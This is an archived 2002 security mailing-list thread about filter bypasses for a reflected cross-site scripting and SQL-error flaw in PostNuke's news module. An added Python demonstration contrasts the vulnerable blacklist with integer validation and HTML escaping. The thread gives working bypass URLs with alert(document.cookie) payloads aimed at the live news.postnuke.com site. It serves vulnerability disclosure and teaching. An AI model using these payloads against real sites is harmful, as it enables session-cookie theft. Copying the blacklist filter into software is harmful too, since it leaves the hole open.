From: Muhammad Faisal Rauf Danka (mfrd_at_attitudex.com)
Date: Wed Oct 02 2002 - 18:24:15 CDT


    I just checked it again:

    http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>

    where + denotes a blank space or similarly this one:

    http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=>alert(document.cookie);</script>

    resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.

    However the request:
    ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>

    or any character inserted before the first "script" and after the first less-than "<", results in a DB Error, revealing nothing (user/pass/path etc.).

    But I used IE and Netscape; maybe it's different with other browsers. :)

    Regards
    --------
    Muhammad Faisal Rauf Danka

    Head of GemSEC / Chief Technology Officer
    Gem Internet Services (Pvt) Ltd.
    web: www.gem.net.pk
    Key Id: 0x784B0202
    Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202

    --- Daniel Woods <dwoodsucalgary.ca> wrote:
    >
    >Humm!
    >
    >> on 26th Sep the following url:
    >>
    >> http://news.postnuke.com/modules.php
    >> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
    >>
    >> used to give Alert PopUp and
    >> Error:
    >> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
    >> at line 23
    >>
    >> now it gives:
    >> Sorry - $HTTP_GET_VARS contains javascript...
    >>
    >> Prompt fix by PostNuke team, great work Keep it up! :)
    >
    >Not so fast on the praise :(
    >
    >It only took me a couple of workarounds to find ways to bypass the check.
    >
    > http://news.postnuke.com/modules.php
    > ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
    >
    >Using the request...
    > ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
    >gives me the DB Error: message
    >
    >And using the request...
    > ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
    >gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
    >
    >Thanks... Dan.

    _____________________________________________________________
    ---------------------------
    [ATTITUDEX.COM]
    http://www.attitudex.com/
    ---------------------------

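The thread above boils down to a substring blacklist on the query string that only recognises the literal spelling "<script>", so "<script+>" (the "+" is decoded to a blank) and "<\script>" slip past it and the unvalidated sid still reaches the SQL query. The following is an added example, not code from the original messages or from PostNuke: the naive_contains_javascript() function is a hypothetical reconstruction of such a blacklist (the real PostNuke check is not shown on the page), the URLs are constructed from the ones quoted in the thread, and the hardened version shows the two checks a practitioner would apply instead: treat sid as an integer before it goes near the database, and HTML-escape anything that is reflected into the page.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed base URL, modelled on the one quoted in the thread.
BASE = "http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid="

# Constructed payloads taken from the thread: the original, the two
# bypasses reported by Daniel Woods, and an ordinary article id.
PAYLOADS = {
    "plain":     "<script>alert(document.cookie);</script>",
    "plus":      "<script+>alert(document.cookie);</script>",
    "backslash": "<\\script>alert(document.cookie);</script>",
    "benign":    "23",
}


def sid_from_url(url: str) -> str:
    """Return the sid parameter the way the server would see it after
    URL decoding: '+' becomes a blank and %xx sequences are decoded."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("sid", [""])[0]


def naive_contains_javascript(value: str) -> bool:
    """Hypothetical reconstruction of a substring blacklist of the kind that
    prints 'Sorry - $HTTP_GET_VARS contains javascript...'. It only matches
    the exact tag spelling '<script>', so any variation gets through."""
    return "<script>" in value.lower()


def hardened_sid(value: str) -> int:
    """Whitelist instead of blacklist: sid is an article id, so it must be a
    short decimal integer. Anything else is rejected before it reaches SQL,
    which also removes the 'DB Error: getArticles: 1064' information leak."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("sid must be a decimal integer")
    return int(value)


def render_safe(value: str) -> str:
    """Output encoding for the (rare) case where a value is echoed back into
    HTML. Encoding at output time makes the tag spelling irrelevant."""
    return html.escape(value, quote=True)


def evaluate(name: str) -> dict:
    """Compare the blacklist and the hardened check on one payload."""
    sid = sid_from_url(BASE + PAYLOADS[name])
    try:
        accepted = hardened_sid(sid)
    except ValueError:
        accepted = None
    return {
        "decoded_sid": sid,
        "blacklist_blocks": naive_contains_javascript(sid),
        "hardened_accepts": accepted,
        "escaped": render_safe(sid),
    }


def run_demo() -> dict:
    """Run every constructed payload through both checks."""
    return {name: evaluate(name) for name in PAYLOADS}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Only the "plain" payload trips the blacklist; "plus" decodes to "<script >", which browsers of the time still executed, and "backslash" is not valid script to a browser but is still junk to the SQL query, which is why both variants reached the DB Error. The hardened_sid() check rejects all three and accepts only the numeric id.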